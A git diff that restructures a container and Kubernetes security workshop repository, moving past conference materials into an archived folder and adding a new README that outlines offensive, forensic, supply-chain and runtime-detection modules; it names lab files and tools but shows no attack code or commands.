diff --git a/README.md b/README.md
index 84d625f..4b80899 100644
--- a/README.md
+++ b/README.md
@@ -1,26 +1,40 @@
# Malicious Containers Workshop
-This repository contains the slides and accompanying lab materials for the workshops delivered at DefCon and other conferences. The most recent being [CactusCon](CactusCon_24/README.md). Each conferences materials will be located in their respective sub-folders.
+A hands-on workshop covering Kubernetes and container security — from offensive techniques to detection and response. Learn to build, deploy, and detect malicious containers in a safe lab environment.
+## Repository Structure
-## Past Workshops
+- **`current/`** — The latest version of the workshop materials, labs, and infrastructure setup. Start here.
+- **`archived/`** — Previous conference-specific versions (DEF CON 30, DEF CON 31, BSides Charleston, CactusCon, ISSA Triad). Preserved for reference.
-The repository also contains past versions of the course, such as the original [Workshop delivered at DEFCON 30 - Creating and Uncovering Malicious Containers](https://forum.defcon.org/node/241774), [DEFCON 31 - Creating and uncovering malicious containers: Redux](https://forum.defcon.org/node/246020) and iterations delivered at [BSides Charleston 22](https://bsideschs.ticketbud.com/ws-creating), [BSides Charleston 23](https://bsideschs.ticketbud.com/ws-malkub), [CactusCon](https://www.cactuscon.com/cc12-schedule) and [ISSA Triad 2023 Security Summit](https://triadnc.issa.org/). As well as any versions to be delivered in the future as we continue to update and improve it or offer it at other events.
+## Getting Started
+See [`current/README.md`](current/README.md) for an overview and [`current/lab-setup.md`](current/lab-setup.md) for environment setup instructions.
+
+## Workshop Modules
+
+1. **Docker Fundamentals** — Images, containers, layers, process hierarchy
+2. **Exploring Containers** — Image history, reverse engineering, extracting artifacts
+3. **Offensive Docker Techniques** — Data exfiltration, socket hijacking, privilege escalation
+4. **Container IR** — Image forensics CTF, cleanup
+5. **Kubernetes 101** — Architecture, components, networking
+6. **Kubernetes Security** — RBAC abuse, privilege escalation, golden ticket attacks, evil pods
+7. **Supply Chain Security** — Image signing (cosign/Sigstore), SBOMs (syft), vulnerability scanning (grype), provenance
+8. **Modern Runtime Security** — Tracee, Falco, Tetragon — eBPF-based detection and comparison
+9. **Cloud-Native Attacks** — IMDS exploitation, workload identity abuse, network policy bypass
## Presenters
### Instructor: David Mitchell
-
->
\
-> https://github.com/digital-shokunin/digital-shokunin/README.md
-
-### Instructor: Adrian Wood
-
->
\
-> https://keybase.io/threlfall
+> [@digish0](https://twitter.com/digish0) | https://digital-shokunin.net
+### Instructor: Adrian Wood
+> [@whitehacksec](https://twitter.com/WHITEHACKSEC) | https://5stars217.github.io
## Our lockpick/hacker(space) group
-[](https://github.com/lockFALE/)
+[](https://github.com/lockFALE/)
+
+## License
+
+See [LICENSE](LICENSE).
diff --git a/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1 with notes.pdf b/archived/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1 with notes.pdf
similarity index 100%
rename from BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1 with notes.pdf
rename to archived/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1 with notes.pdf
diff --git a/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1.pdf b/archived/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1.pdf
similarity index 100%
rename from BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1.pdf
rename to archived/BSides_Charleston_23/BSidesCHS23 Malicious Containers Workshop1.1.pdf
diff --git a/BSides_Charleston_23/Lab Setup.md b/archived/BSides_Charleston_23/Lab Setup.md
similarity index 100%
rename from BSides_Charleston_23/Lab Setup.md
rename to archived/BSides_Charleston_23/Lab Setup.md
diff --git a/BSides_Charleston_23/README.md b/archived/BSides_Charleston_23/README.md
similarity index 100%
rename from BSides_Charleston_23/README.md
rename to archived/BSides_Charleston_23/README.md
diff --git a/BSides_Charleston_23/cheatsheet.md b/archived/BSides_Charleston_23/cheatsheet.md
similarity index 100%
rename from BSides_Charleston_23/cheatsheet.md
rename to archived/BSides_Charleston_23/cheatsheet.md
diff --git a/BSides_Charleston_23/grafana/tracee-dashboard.json b/archived/BSides_Charleston_23/grafana/tracee-dashboard.json
similarity index 100%
rename from BSides_Charleston_23/grafana/tracee-dashboard.json
rename to archived/BSides_Charleston_23/grafana/tracee-dashboard.json
diff --git a/BSides_Charleston_23/helm-config/grafana-config.yaml b/archived/BSides_Charleston_23/helm-config/grafana-config.yaml
similarity index 100%
rename from BSides_Charleston_23/helm-config/grafana-config.yaml
rename to archived/BSides_Charleston_23/helm-config/grafana-config.yaml
diff --git a/BSides_Charleston_23/helm-config/promtail-config.yaml b/archived/BSides_Charleston_23/helm-config/promtail-config.yaml
similarity index 100%
rename from BSides_Charleston_23/helm-config/promtail-config.yaml
rename to archived/BSides_Charleston_23/helm-config/promtail-config.yaml
diff --git a/BSides_Charleston_23/image.png b/archived/BSides_Charleston_23/image.png
similarity index 100%
rename from BSides_Charleston_23/image.png
rename to archived/BSides_Charleston_23/image.png
diff --git a/BSides_Charleston_23/k8s-ansible-setup.yml b/archived/BSides_Charleston_23/k8s-ansible-setup.yml
similarity index 100%
rename from BSides_Charleston_23/k8s-ansible-setup.yml
rename to archived/BSides_Charleston_23/k8s-ansible-setup.yml
diff --git a/BSides_Charleston_23/k8s-manifests/attacker-pod.yaml b/archived/BSides_Charleston_23/k8s-manifests/attacker-pod.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/attacker-pod.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/attacker-pod.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/clusterrolebindings.yaml b/archived/BSides_Charleston_23/k8s-manifests/clusterrolebindings.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/clusterrolebindings.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/clusterrolebindings.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/clusterroles.yaml b/archived/BSides_Charleston_23/k8s-manifests/clusterroles.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/clusterroles.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/clusterroles.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/configmaps.yaml b/archived/BSides_Charleston_23/k8s-manifests/configmaps.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/configmaps.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/configmaps.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/daemonsets.yaml b/archived/BSides_Charleston_23/k8s-manifests/daemonsets.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/daemonsets.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/daemonsets.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/deployments.yaml b/archived/BSides_Charleston_23/k8s-manifests/deployments.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/deployments.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/deployments.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/evilpod.yaml b/archived/BSides_Charleston_23/k8s-manifests/evilpod.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/evilpod.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/evilpod.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/ingress.yaml b/archived/BSides_Charleston_23/k8s-manifests/ingress.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/ingress.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/ingress.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/namespaces.yaml b/archived/BSides_Charleston_23/k8s-manifests/namespaces.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/namespaces.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/namespaces.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/nothingallowedpod.yaml b/archived/BSides_Charleston_23/k8s-manifests/nothingallowedpod.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/nothingallowedpod.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/nothingallowedpod.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/pods.yaml b/archived/BSides_Charleston_23/k8s-manifests/pods.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/pods.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/pods.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/rolebindings.yaml b/archived/BSides_Charleston_23/k8s-manifests/rolebindings.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/rolebindings.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/rolebindings.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/roles.yaml b/archived/BSides_Charleston_23/k8s-manifests/roles.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/roles.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/roles.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/secrets.yaml b/archived/BSides_Charleston_23/k8s-manifests/secrets.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/secrets.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/secrets.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/serviceaccounts.yaml b/archived/BSides_Charleston_23/k8s-manifests/serviceaccounts.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/serviceaccounts.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/serviceaccounts.yaml
diff --git a/BSides_Charleston_23/k8s-manifests/services.yaml b/archived/BSides_Charleston_23/k8s-manifests/services.yaml
similarity index 100%
rename from BSides_Charleston_23/k8s-manifests/services.yaml
rename to archived/BSides_Charleston_23/k8s-manifests/services.yaml
diff --git a/BSides_Charleston_23/kind-lab-config.yaml b/archived/BSides_Charleston_23/kind-lab-config.yaml
similarity index 100%
rename from BSides_Charleston_23/kind-lab-config.yaml
rename to archived/BSides_Charleston_23/kind-lab-config.yaml
diff --git a/BSides_Charleston_23/lab-ansible-setup.yml b/archived/BSides_Charleston_23/lab-ansible-setup.yml
similarity index 100%
rename from BSides_Charleston_23/lab-ansible-setup.yml
rename to archived/BSides_Charleston_23/lab-ansible-setup.yml
diff --git a/BSides_Charleston_23/labs_walk_thru.md b/archived/BSides_Charleston_23/labs_walk_thru.md
similarity index 100%
rename from BSides_Charleston_23/labs_walk_thru.md
rename to archived/BSides_Charleston_23/labs_walk_thru.md
diff --git a/BSides_Charleston_23/scripts/reverse_shell_handler.py b/archived/BSides_Charleston_23/scripts/reverse_shell_handler.py
similarity index 100%
rename from BSides_Charleston_23/scripts/reverse_shell_handler.py
rename to archived/BSides_Charleston_23/scripts/reverse_shell_handler.py
diff --git a/Bsides_Charleston_22/Bsides_Workshop_Pre_Release_1.3.pptx.pdf b/archived/Bsides_Charleston_22/Bsides_Workshop_Pre_Release_1.3.pptx.pdf
similarity index 100%
rename from Bsides_Charleston_22/Bsides_Workshop_Pre_Release_1.3.pptx.pdf
rename to archived/Bsides_Charleston_22/Bsides_Workshop_Pre_Release_1.3.pptx.pdf
diff --git a/Bsides_Charleston_22/Incident Response in containerized and ephemeral environments.pdf b/archived/Bsides_Charleston_22/Incident Response in containerized and ephemeral environments.pdf
similarity index 100%
rename from Bsides_Charleston_22/Incident Response in containerized and ephemeral environments.pdf
rename to archived/Bsides_Charleston_22/Incident Response in containerized and ephemeral environments.pdf
diff --git a/Bsides_Charleston_22/Lab Setup.md b/archived/Bsides_Charleston_22/Lab Setup.md
similarity index 100%
rename from Bsides_Charleston_22/Lab Setup.md
rename to archived/Bsides_Charleston_22/Lab Setup.md
diff --git a/Bsides_Charleston_22/cheatsheet.md b/archived/Bsides_Charleston_22/cheatsheet.md
similarity index 100%
rename from Bsides_Charleston_22/cheatsheet.md
rename to archived/Bsides_Charleston_22/cheatsheet.md
diff --git a/Bsides_Charleston_22/kind-lab-config.yaml b/archived/Bsides_Charleston_22/kind-lab-config.yaml
similarity index 100%
rename from Bsides_Charleston_22/kind-lab-config.yaml
rename to archived/Bsides_Charleston_22/kind-lab-config.yaml
diff --git a/Bsides_Charleston_22/labs_walk_thru.md b/archived/Bsides_Charleston_22/labs_walk_thru.md
similarity index 100%
rename from Bsides_Charleston_22/labs_walk_thru.md
rename to archived/Bsides_Charleston_22/labs_walk_thru.md
diff --git a/Bsides_Charleston_22/readme.md b/archived/Bsides_Charleston_22/readme.md
similarity index 100%
rename from Bsides_Charleston_22/readme.md
rename to archived/Bsides_Charleston_22/readme.md
diff --git a/CactusCon_24/CactusCon'24 Malicious Containers Workshop.pdf b/archived/CactusCon_24/CactusCon'24 Malicious Containers Workshop.pdf
similarity index 100%
rename from CactusCon_24/CactusCon'24 Malicious Containers Workshop.pdf
rename to archived/CactusCon_24/CactusCon'24 Malicious Containers Workshop.pdf
diff --git a/CactusCon_24/Lab Setup.md b/archived/CactusCon_24/Lab Setup.md
similarity index 100%
rename from CactusCon_24/Lab Setup.md
rename to archived/CactusCon_24/Lab Setup.md
diff --git a/CactusCon_24/README.md b/archived/CactusCon_24/README.md
similarity index 100%
rename from CactusCon_24/README.md
rename to archived/CactusCon_24/README.md
diff --git a/CactusCon_24/cheatsheet.md b/archived/CactusCon_24/cheatsheet.md
similarity index 100%
rename from CactusCon_24/cheatsheet.md
rename to archived/CactusCon_24/cheatsheet.md
diff --git a/CactusCon_24/grafana/tracee-dashboard.json b/archived/CactusCon_24/grafana/tracee-dashboard.json
similarity index 100%
rename from CactusCon_24/grafana/tracee-dashboard.json
rename to archived/CactusCon_24/grafana/tracee-dashboard.json
diff --git a/CactusCon_24/helm-config/grafana-config.yaml b/archived/CactusCon_24/helm-config/grafana-config.yaml
similarity index 100%
rename from CactusCon_24/helm-config/grafana-config.yaml
rename to archived/CactusCon_24/helm-config/grafana-config.yaml
diff --git a/CactusCon_24/helm-config/promtail-config.yaml b/archived/CactusCon_24/helm-config/promtail-config.yaml
similarity index 100%
rename from CactusCon_24/helm-config/promtail-config.yaml
rename to archived/CactusCon_24/helm-config/promtail-config.yaml
diff --git a/CactusCon_24/image.png b/archived/CactusCon_24/image.png
similarity index 100%
rename from CactusCon_24/image.png
rename to archived/CactusCon_24/image.png
diff --git a/CactusCon_24/k8s-ansible-setup.yml b/archived/CactusCon_24/k8s-ansible-setup.yml
similarity index 100%
rename from CactusCon_24/k8s-ansible-setup.yml
rename to archived/CactusCon_24/k8s-ansible-setup.yml
diff --git a/CactusCon_24/k8s-manifests/attacker-pod.yaml b/archived/CactusCon_24/k8s-manifests/attacker-pod.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/attacker-pod.yaml
rename to archived/CactusCon_24/k8s-manifests/attacker-pod.yaml
diff --git a/CactusCon_24/k8s-manifests/clusterrolebindings.yaml b/archived/CactusCon_24/k8s-manifests/clusterrolebindings.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/clusterrolebindings.yaml
rename to archived/CactusCon_24/k8s-manifests/clusterrolebindings.yaml
diff --git a/CactusCon_24/k8s-manifests/clusterroles.yaml b/archived/CactusCon_24/k8s-manifests/clusterroles.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/clusterroles.yaml
rename to archived/CactusCon_24/k8s-manifests/clusterroles.yaml
diff --git a/CactusCon_24/k8s-manifests/configmaps.yaml b/archived/CactusCon_24/k8s-manifests/configmaps.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/configmaps.yaml
rename to archived/CactusCon_24/k8s-manifests/configmaps.yaml
diff --git a/CactusCon_24/k8s-manifests/daemonsets.yaml b/archived/CactusCon_24/k8s-manifests/daemonsets.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/daemonsets.yaml
rename to archived/CactusCon_24/k8s-manifests/daemonsets.yaml
diff --git a/CactusCon_24/k8s-manifests/deployments.yaml b/archived/CactusCon_24/k8s-manifests/deployments.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/deployments.yaml
rename to archived/CactusCon_24/k8s-manifests/deployments.yaml
diff --git a/CactusCon_24/k8s-manifests/evilpod.yaml b/archived/CactusCon_24/k8s-manifests/evilpod.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/evilpod.yaml
rename to archived/CactusCon_24/k8s-manifests/evilpod.yaml
diff --git a/CactusCon_24/k8s-manifests/ingress.yaml b/archived/CactusCon_24/k8s-manifests/ingress.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/ingress.yaml
rename to archived/CactusCon_24/k8s-manifests/ingress.yaml
diff --git a/CactusCon_24/k8s-manifests/namespaces.yaml b/archived/CactusCon_24/k8s-manifests/namespaces.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/namespaces.yaml
rename to archived/CactusCon_24/k8s-manifests/namespaces.yaml
diff --git a/CactusCon_24/k8s-manifests/nothingallowedpod.yaml b/archived/CactusCon_24/k8s-manifests/nothingallowedpod.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/nothingallowedpod.yaml
rename to archived/CactusCon_24/k8s-manifests/nothingallowedpod.yaml
diff --git a/CactusCon_24/k8s-manifests/pods.yaml b/archived/CactusCon_24/k8s-manifests/pods.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/pods.yaml
rename to archived/CactusCon_24/k8s-manifests/pods.yaml
diff --git a/CactusCon_24/k8s-manifests/rolebindings.yaml b/archived/CactusCon_24/k8s-manifests/rolebindings.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/rolebindings.yaml
rename to archived/CactusCon_24/k8s-manifests/rolebindings.yaml
diff --git a/CactusCon_24/k8s-manifests/roles.yaml b/archived/CactusCon_24/k8s-manifests/roles.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/roles.yaml
rename to archived/CactusCon_24/k8s-manifests/roles.yaml
diff --git a/CactusCon_24/k8s-manifests/secrets.yaml b/archived/CactusCon_24/k8s-manifests/secrets.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/secrets.yaml
rename to archived/CactusCon_24/k8s-manifests/secrets.yaml
diff --git a/CactusCon_24/k8s-manifests/serviceaccounts.yaml b/archived/CactusCon_24/k8s-manifests/serviceaccounts.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/serviceaccounts.yaml
rename to archived/CactusCon_24/k8s-manifests/serviceaccounts.yaml
diff --git a/CactusCon_24/k8s-manifests/services.yaml b/archived/CactusCon_24/k8s-manifests/services.yaml
similarity index 100%
rename from CactusCon_24/k8s-manifests/services.yaml
rename to archived/CactusCon_24/k8s-manifests/services.yaml
diff --git a/CactusCon_24/kind-lab-config.yaml b/archived/CactusCon_24/kind-lab-config.yaml
similarity index 100%
rename from CactusCon_24/kind-lab-config.yaml
rename to archived/CactusCon_24/kind-lab-config.yaml
diff --git a/CactusCon_24/lab-ansible-setup.yml b/archived/CactusCon_24/lab-ansible-setup.yml
similarity index 100%
rename from CactusCon_24/lab-ansible-setup.yml
rename to archived/CactusCon_24/lab-ansible-setup.yml
diff --git a/CactusCon_24/labs_walk_thru.md b/archived/CactusCon_24/labs_walk_thru.md
similarity index 100%
rename from CactusCon_24/labs_walk_thru.md
rename to archived/CactusCon_24/labs_walk_thru.md
diff --git a/CactusCon_24/scripts/reverse_shell_handler.py b/archived/CactusCon_24/scripts/reverse_shell_handler.py
similarity index 100%
rename from CactusCon_24/scripts/reverse_shell_handler.py
rename to archived/CactusCon_24/scripts/reverse_shell_handler.py
diff --git a/DC30/Defcon_Workshop_Release_1.0.pptx.pdf b/archived/DC30/Defcon_Workshop_Release_1.0.pptx.pdf
similarity index 100%
rename from DC30/Defcon_Workshop_Release_1.0.pptx.pdf
rename to archived/DC30/Defcon_Workshop_Release_1.0.pptx.pdf
diff --git a/DC30/Defcon_Workshop_Release_1.1.with notes.pdf b/archived/DC30/Defcon_Workshop_Release_1.1.with notes.pdf
similarity index 100%
rename from DC30/Defcon_Workshop_Release_1.1.with notes.pdf
rename to archived/DC30/Defcon_Workshop_Release_1.1.with notes.pdf
diff --git a/DC30/Lab Setup.md b/archived/DC30/Lab Setup.md
similarity index 100%
rename from DC30/Lab Setup.md
rename to archived/DC30/Lab Setup.md
diff --git a/DC30/README.md b/archived/DC30/README.md
similarity index 100%
rename from DC30/README.md
rename to archived/DC30/README.md
diff --git a/DC30/cheatsheet.md b/archived/DC30/cheatsheet.md
similarity index 100%
rename from DC30/cheatsheet.md
rename to archived/DC30/cheatsheet.md
diff --git a/DC30/kind-lab-config.yaml b/archived/DC30/kind-lab-config.yaml
similarity index 100%
rename from DC30/kind-lab-config.yaml
rename to archived/DC30/kind-lab-config.yaml
diff --git a/DC30/labs_walk_thru.md b/archived/DC30/labs_walk_thru.md
similarity index 100%
rename from DC30/labs_walk_thru.md
rename to archived/DC30/labs_walk_thru.md
diff --git a/DC31/DC31 Malicious Containers Workshop1.1.pdf b/archived/DC31/DC31 Malicious Containers Workshop1.1.pdf
similarity index 100%
rename from DC31/DC31 Malicious Containers Workshop1.1.pdf
rename to archived/DC31/DC31 Malicious Containers Workshop1.1.pdf
diff --git a/DC31/Lab Setup.md b/archived/DC31/Lab Setup.md
similarity index 100%
rename from DC31/Lab Setup.md
rename to archived/DC31/Lab Setup.md
diff --git a/DC31/README.md b/archived/DC31/README.md
similarity index 100%
rename from DC31/README.md
rename to archived/DC31/README.md
diff --git a/DC31/cheatsheet.md b/archived/DC31/cheatsheet.md
similarity index 100%
rename from DC31/cheatsheet.md
rename to archived/DC31/cheatsheet.md
diff --git a/DC31/grafana/tracee-dashboard.json b/archived/DC31/grafana/tracee-dashboard.json
similarity index 100%
rename from DC31/grafana/tracee-dashboard.json
rename to archived/DC31/grafana/tracee-dashboard.json
diff --git a/DC31/helm-config/grafana-config.yaml b/archived/DC31/helm-config/grafana-config.yaml
similarity index 100%
rename from DC31/helm-config/grafana-config.yaml
rename to archived/DC31/helm-config/grafana-config.yaml
diff --git a/DC31/helm-config/promtail-config.yaml b/archived/DC31/helm-config/promtail-config.yaml
similarity index 100%
rename from DC31/helm-config/promtail-config.yaml
rename to archived/DC31/helm-config/promtail-config.yaml
diff --git a/DC31/k8s-ansible-setup.yml b/archived/DC31/k8s-ansible-setup.yml
similarity index 100%
rename from DC31/k8s-ansible-setup.yml
rename to archived/DC31/k8s-ansible-setup.yml
diff --git a/DC31/k8s-manifests/clusterrolebindings.yaml b/archived/DC31/k8s-manifests/clusterrolebindings.yaml
similarity index 100%
rename from DC31/k8s-manifests/clusterrolebindings.yaml
rename to archived/DC31/k8s-manifests/clusterrolebindings.yaml
diff --git a/DC31/k8s-manifests/clusterroles.yaml b/archived/DC31/k8s-manifests/clusterroles.yaml
similarity index 100%
rename from DC31/k8s-manifests/clusterroles.yaml
rename to archived/DC31/k8s-manifests/clusterroles.yaml
diff --git a/DC31/k8s-manifests/configmaps.yaml b/archived/DC31/k8s-manifests/configmaps.yaml
similarity index 100%
rename from DC31/k8s-manifests/configmaps.yaml
rename to archived/DC31/k8s-manifests/configmaps.yaml
diff --git a/DC31/k8s-manifests/daemonsets.yaml b/archived/DC31/k8s-manifests/daemonsets.yaml
similarity index 100%
rename from DC31/k8s-manifests/daemonsets.yaml
rename to archived/DC31/k8s-manifests/daemonsets.yaml
diff --git a/DC31/k8s-manifests/deployments.yaml b/archived/DC31/k8s-manifests/deployments.yaml
similarity index 100%
rename from DC31/k8s-manifests/deployments.yaml
rename to archived/DC31/k8s-manifests/deployments.yaml
diff --git a/DC31/k8s-manifests/evilpod.yaml b/archived/DC31/k8s-manifests/evilpod.yaml
similarity index 100%
rename from DC31/k8s-manifests/evilpod.yaml
rename to archived/DC31/k8s-manifests/evilpod.yaml
diff --git a/DC31/k8s-manifests/ingress.yaml b/archived/DC31/k8s-manifests/ingress.yaml
similarity index 100%
rename from DC31/k8s-manifests/ingress.yaml
rename to archived/DC31/k8s-manifests/ingress.yaml
diff --git a/DC31/k8s-manifests/namespaces.yaml b/archived/DC31/k8s-manifests/namespaces.yaml
similarity index 100%
rename from DC31/k8s-manifests/namespaces.yaml
rename to archived/DC31/k8s-manifests/namespaces.yaml
diff --git a/DC31/k8s-manifests/nothingallowedpod.yaml b/archived/DC31/k8s-manifests/nothingallowedpod.yaml
similarity index 100%
rename from DC31/k8s-manifests/nothingallowedpod.yaml
rename to archived/DC31/k8s-manifests/nothingallowedpod.yaml
diff --git a/DC31/k8s-manifests/pods.yaml b/archived/DC31/k8s-manifests/pods.yaml
similarity index 100%
rename from DC31/k8s-manifests/pods.yaml
rename to archived/DC31/k8s-manifests/pods.yaml
diff --git a/DC31/k8s-manifests/rolebindings.yaml b/archived/DC31/k8s-manifests/rolebindings.yaml
similarity index 100%
rename from DC31/k8s-manifests/rolebindings.yaml
rename to archived/DC31/k8s-manifests/rolebindings.yaml
diff --git a/DC31/k8s-manifests/roles.yaml b/archived/DC31/k8s-manifests/roles.yaml
similarity index 100%
rename from DC31/k8s-manifests/roles.yaml
rename to archived/DC31/k8s-manifests/roles.yaml
diff --git a/DC31/k8s-manifests/secrets.yaml b/archived/DC31/k8s-manifests/secrets.yaml
similarity index 100%
rename from DC31/k8s-manifests/secrets.yaml
rename to archived/DC31/k8s-manifests/secrets.yaml
diff --git a/DC31/k8s-manifests/serviceaccounts.yaml b/archived/DC31/k8s-manifests/serviceaccounts.yaml
similarity index 100%
rename from DC31/k8s-manifests/serviceaccounts.yaml
rename to archived/DC31/k8s-manifests/serviceaccounts.yaml
diff --git a/DC31/k8s-manifests/services.yaml b/archived/DC31/k8s-manifests/services.yaml
similarity index 100%
rename from DC31/k8s-manifests/services.yaml
rename to archived/DC31/k8s-manifests/services.yaml
diff --git a/DC31/kind-lab-config.yaml b/archived/DC31/kind-lab-config.yaml
similarity index 100%
rename from DC31/kind-lab-config.yaml
rename to archived/DC31/kind-lab-config.yaml
diff --git a/DC31/lab-ansible-setup.yml b/archived/DC31/lab-ansible-setup.yml
similarity index 100%
rename from DC31/lab-ansible-setup.yml
rename to archived/DC31/lab-ansible-setup.yml
diff --git a/DC31/labs_walk_thru.md b/archived/DC31/labs_walk_thru.md
similarity index 100%
rename from DC31/labs_walk_thru.md
rename to archived/DC31/labs_walk_thru.md
diff --git a/ISSA_Triad_23/ISSA_Workshop_Pre_Release_1.3.pptx.pdf b/archived/ISSA_Triad_23/ISSA_Workshop_Pre_Release_1.3.pptx.pdf
similarity index 100%
rename from ISSA_Triad_23/ISSA_Workshop_Pre_Release_1.3.pptx.pdf
rename to archived/ISSA_Triad_23/ISSA_Workshop_Pre_Release_1.3.pptx.pdf
diff --git a/ISSA_Triad_23/Lab Setup.md b/archived/ISSA_Triad_23/Lab Setup.md
similarity index 100%
rename from ISSA_Triad_23/Lab Setup.md
rename to archived/ISSA_Triad_23/Lab Setup.md
diff --git a/ISSA_Triad_23/cheatsheet.md b/archived/ISSA_Triad_23/cheatsheet.md
similarity index 100%
rename from ISSA_Triad_23/cheatsheet.md
rename to archived/ISSA_Triad_23/cheatsheet.md
diff --git a/ISSA_Triad_23/kind-lab-config.yaml b/archived/ISSA_Triad_23/kind-lab-config.yaml
similarity index 100%
rename from ISSA_Triad_23/kind-lab-config.yaml
rename to archived/ISSA_Triad_23/kind-lab-config.yaml
diff --git a/ISSA_Triad_23/labs_walk_thru.md b/archived/ISSA_Triad_23/labs_walk_thru.md
similarity index 100%
rename from ISSA_Triad_23/labs_walk_thru.md
rename to archived/ISSA_Triad_23/labs_walk_thru.md
diff --git a/ISSA_Triad_23/readme.me b/archived/ISSA_Triad_23/readme.me
similarity index 100%
rename from ISSA_Triad_23/readme.me
rename to archived/ISSA_Triad_23/readme.me
diff --git a/current/CactusCon'24 Malicious Containers Workshop.pdf b/current/CactusCon'24 Malicious Containers Workshop.pdf
new file mode 100644
index 0000000..0f92898
Binary files /dev/null and b/current/CactusCon'24 Malicious Containers Workshop.pdf differ
diff --git a/current/README.md b/current/README.md
new file mode 100644
index 0000000..9927d64
--- /dev/null
+++ b/current/README.md
@@ -0,0 +1,50 @@
+# Malicious Kubernetes Workshop
+
+This directory contains the current version of the Malicious Kubernetes workshop materials. The workshop is an introduction to Kubernetes and container security — covering cluster deployment, offensive container techniques, privilege escalation, supply chain security, and runtime detection with modern eBPF-based tools.
+
+
+
+## Quick Start
+
+1. **[Lab Setup](lab-setup.md)** — Environment setup (GCP VM, tooling, kind cluster)
+2. **[Lab Walk-Through](labs_walk_thru.md)** — Step-by-step lab instructions for all modules
+3. **[Cheat Sheet](cheatsheet.md)** — Troubleshooting and quick reference
+
+## What's Covered
+
+| Module | Topic |
+|--------|-------|
+| 1 | Docker fundamentals |
+| 2 | Exploring container images & reverse engineering |
+| 3 | Offensive Docker techniques (exfil, socket hijacking, persistence) |
+| 4 | Container incident response CTF |
+| 5 | Kubernetes 101 |
+| 6 | Kubernetes security — RBAC abuse, priv esc, golden tickets, evil pods |
+| 7 | Supply chain security — cosign, syft, grype, image provenance |
+| 8 | Modern runtime security — Tracee, Falco, Tetragon |
+| 9 | Cloud-native & managed K8s attacks — IMDS, workload identity, network policy bypass |
+
+## Tools Used
+
+- **Infrastructure**: kind, kubectl (v1.31), Helm v3, Ansible
+- **Observability**: Prometheus, Grafana, Loki, Promtail
+- **Runtime Security**: Tracee, Falco (+Falcosidekick), Tetragon
+- **Supply Chain**: cosign, crane, syft, grype
+- **Offensive**: ngrok, openssl, nmap, socat
+
+## Presenters
+
+### Instructor: David Mitchell
+
+
+> [@digish0](https://twitter.com/digish0)\
+> https://digital-shokunin.net
+
+### Instructor: Adrian Wood
+
+> [@whitehacksec](https://twitter.com/WHITEHACKSEC)\
+> https://5stars217.github.io
+
+## Our lockpick/hacker(space) group
+
+
diff --git a/current/cheatsheet.md b/current/cheatsheet.md
new file mode 100644
index 0000000..dd5733d
--- /dev/null
+++ b/current/cheatsheet.md
@@ -0,0 +1,213 @@
+# Cheatsheet
+**This companion file collects the lab commands and troubleshooting tips, especially for those new to Linux, Docker, and Kubernetes.**
+
